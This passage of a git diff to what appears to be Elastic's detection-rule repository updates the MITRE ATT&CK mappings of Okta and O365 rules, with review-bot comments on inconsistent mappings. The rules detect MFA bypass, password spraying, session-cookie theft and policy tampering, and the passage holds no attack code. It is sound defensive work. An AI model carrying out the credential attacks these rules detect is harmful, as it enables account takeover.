+id = "T1484.002"
+name = "Trust Modification"
+reference = "https://attack.mitre.org/techniques/T1484/002/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
index e354d1a2bfa..6ba483860a8 100644
--- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
+++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/02"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -87,34 +87,18 @@ event.dataset:o365.audit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml
index a7c2689ef36..5d362666fe7 100644
--- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml
+++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
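Review bot: Removing the Persistence `[[rule.threat]]` entry for T1098.003 in privilege_escalation_sharepoint_site_collection_admin_added goes the opposite way from the persistence_entra_id_global_administrator_role_assign, persistence_exchange_management_role_assignment and persistence_exchange_suspicious_mailbox_permission_delegation hunks, where the same technique/subtechnique is deliberately mapped to both Persistence and Privilege Escalation in this commit. If a site-collection admin grant is meant to carry only TA0004, a one-line reason in the commit message or the rule's description would keep the next mapping pass from re-adding the entry; otherwise the second block should stay for consistency with the other Account Manipulation rules. Any `Tactic: Persistence` tag this rule carried lives outside the hunk and would need to be dropped in step.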
@@ -81,14 +81,31 @@ event.dataset:okta.system and event.action:user.mfa.attempt_bypass
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1111"
 name = "Multi-Factor Authentication Interception"
 reference = "https://attack.mitre.org/techniques/T1111/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml
index 0c7a8ec869e..e7ef9688ee1 100644
--- a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml
+++ b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/19"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic", "@BenB196", "Austin Songer"]
@@ -79,17 +79,26 @@ event.dataset:okta.system and event.action:user.account.lock
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.001"
+name = "Password Guessing"
+reference = "https://attack.mitre.org/techniques/T1110/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1110.003"
+name = "Password Spraying"
+reference = "https://attack.mitre.org/techniques/T1110/003/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.threshold]
 field = ["okta.actor.alternate_id"]
 value = 3
diff --git a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml
index 032c715eb49..9480d17099e 100644
--- a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml
+++ b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/10"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/08"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
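Review bot: The first added `[[rule.threat.technique.subtechnique]]` table (T1110.001) follows `reference = "https://attack.mitre.org/techniques/T1110/"` with no blank separator, whereas every other hunk in this commit inserts a `+` blank line between technique, subtechnique and tactic tables; the credential_access_okta_brute_force_device_token_rotation hunk has the same gap before its T1110.001 table. A blank line before `[[rule.threat.technique.subtechnique]]` would keep both files in the layout the rest of the change normalises to, which is presumably what the rule formatter emits. Only the threat section of the rule is visible here; the `tags` array is outside the hunk.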
@@ -92,32 +92,44 @@ event.dataset:okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
 reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
 [[rule.threat.technique.subtechnique]]
 id = "T1110.004"
 name = "Credential Stuffing"
 reference = "https://attack.mitre.org/techniques/T1110/004/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.threshold]
 field = ["okta.debug_context.debug_data.dt_hash"]
 value = 1
diff --git a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml
index 03486d8b6ad..46a0131cce9 100644
--- a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml
+++ b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/08"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -107,14 +107,31 @@ from logs-okta*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1539"
 name = "Steal Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1539/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.004"
+name = "Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1550/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
index 208243ef930..49f0b900a26 100644
--- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
+++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/22"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/10/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -79,17 +79,34 @@ data_stream.dataset: "okta.system"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1539"
 name = "Steal Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1539/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.004"
+name = "Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1550/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
index 463bd891fd3..1c9ca26250d 100644
--- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
+++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/26"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -159,22 +159,25 @@ FROM logs-okta.system-*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1539"
 name = "Steal Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1539/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1550.004"
 name = "Web Session Cookie"
@@ -185,3 +188,20 @@ id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.004"
+name = "Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1550/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml
index a27b743a262..223874210c3 100644
--- a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml
+++ b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/17"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -113,29 +113,23 @@ from logs-okta*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
 reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
 [[rule.threat.technique.subtechnique]]
 id = "T1110.004"
 name = "Credential Stuffing"
 reference = "https://attack.mitre.org/techniques/T1110/004/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml
index 72b54d82017..c44cebb4c05 100644
--- a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml
+++ b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/17"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/02/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -122,14 +122,18 @@ FROM logs-okta.system-* METADATA _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.001"
+name = "Password Guessing"
+reference = "https://attack.mitre.org/techniques/T1110/001/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml b/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml
index 81619833eb3..dcb805b61e1 100644
--- a/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml
+++ b/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/18"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -100,14 +100,31 @@ sequence by okta.actor.id with maxspan=10m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1621"
 name = "Multi-Factor Authentication Request Generation"
 reference = "https://attack.mitre.org/techniques/T1621/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml b/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml
index ad755fa3b9a..e9241ff3031 100644
--- a/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml
+++ b/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/05"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -102,14 +102,31 @@ sequence by okta.actor.id with maxspan=10m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1621"
 name = "Multi-Factor Authentication Request Generation"
 reference = "https://attack.mitre.org/techniques/T1621/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml
index eef4992bb6a..ac2b3ea1aad 100644
--- a/rules/integrations/okta/credential_access_user_impersonation_access.toml
+++ b/rules/integrations/okta/credential_access_user_impersonation_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/03/22"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -80,3 +80,20 @@ id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml
index 5291da1293e..752ebc8c231 100644
--- a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml
+++ b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -81,19 +81,28 @@ event.dataset:okta.system and event.action:zone.deactivate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1484.002"
+name = "Trust Modification"
+reference = "https://attack.mitre.org/techniques/T1484/002/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
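Review bot: Deactivating an Okta network zone (`event.action:zone.deactivate`) is mapped here to the T1484.002 Trust Modification subtechnique, while the defense_evasion_okta_attempt_to_modify_okta_network_zone hunk later in this commit (`zone.update or network_zone.rule.dis…`) maps the same object to the parent T1484 only. A network zone is an IP allow/deny policy rather than a domain or tenant trust relationship, so the parent technique used in the modify-zone hunk looks like the better fit for both rules; if the subtechnique is intentional here, the reason belongs in the rule's description. Only the `[[rule.threat]]` list of the deactivate-zone rule is visible in this hunk, so the description and `tags` could not be checked against it.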
diff --git a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml
index c2ae0981e52..952fb62b7ca 100644
--- a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml
+++ b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/11"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -88,22 +88,31 @@ event.dataset: okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1550.001"
 name = "Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["okta.actor.display_name"]
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml
index afb56b6df29..b1071d0ebbe 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -88,19 +88,28 @@ event.dataset:okta.system and event.action:policy.lifecycle.deactivate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml
index 497da81d4d9..a62d5f3a540 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
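Review bot: The four Okta policy lifecycle rules touched by this commit end up with different technique sets for what is the same object: `policy.lifecycle.deactivate` (this hunk) gets T1556.006 under Defense Evasion only, `policy.lifecycle.delete` (defense_evasion_okta_attempt_to_delete_okta_policy, two hunks on) gets T1556.006 under Defense Evasion plus a second `[[rule.threat]]` block under TA0006 Credential Access, `policy.rule.deactivate` (next hunk) gets T1556 with no subtechnique, and `policy.rule.delete` (defense_evasion_okta_attempt_to_delete_okta_policy_rule) gets T1484 instead. Deactivating and deleting a policy or rule have the same effect on the authentication controls it enforced, so the pairs should arguably carry identical mappings — either add the Credential Access block and the `.006` subtechnique to the deactivate rules or drop them from the delete rules, and pick one of T1556/T1484 for the rule-level pair. Whichever direction is chosen, the matching `Tactic:` tags live outside these hunks and must agree with the final tactic set.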
@@ -87,19 +87,23 @@ event.dataset:okta.system and event.action:policy.rule.deactivate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml
index d15fdf5794f..b255db54235 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/28"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -88,19 +88,46 @@ event.dataset:okta.system and event.action:policy.lifecycle.delete
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml
index 5b253b86daa..b11ae8c912b 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
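Review bot: The appended `[[rule.threat]]` entry gives this rule a second tactic, Credential Access, but nothing in the hunk touches the rule's `tags` array, which lives in the `[rule]` table above the hunk and, in this repository, carries a matching `Tactic: Credential Access` entry that the rule tests appear to cross-check against the threat tactics. The same omission would apply to every later hunk that appends a new tactic entry (the deactivate/delete/modify-application, first-occurrence-via-proxy, third-party-IdP, SSO-from-unknown-device, multiple-sessions, administrator-privileges/role, reset-MFA, MFA-deactivation, new-IdP and sign-on-policy rules), and in reverse to the suspicious-activity-reported hunk, which drops Persistence, Privilege Escalation and Defense Evasion and would leave their `Tactic:` tags orphaned if they are still present. Please confirm each affected `tags` line was updated in the same commit, since the tag/tactic mismatch is not visible from these hunks alone.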
@@ -87,19 +87,23 @@ event.dataset:okta.system and event.action:policy.rule.delete
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml
index 2811f0d54cf..4c429ca0f58 100644
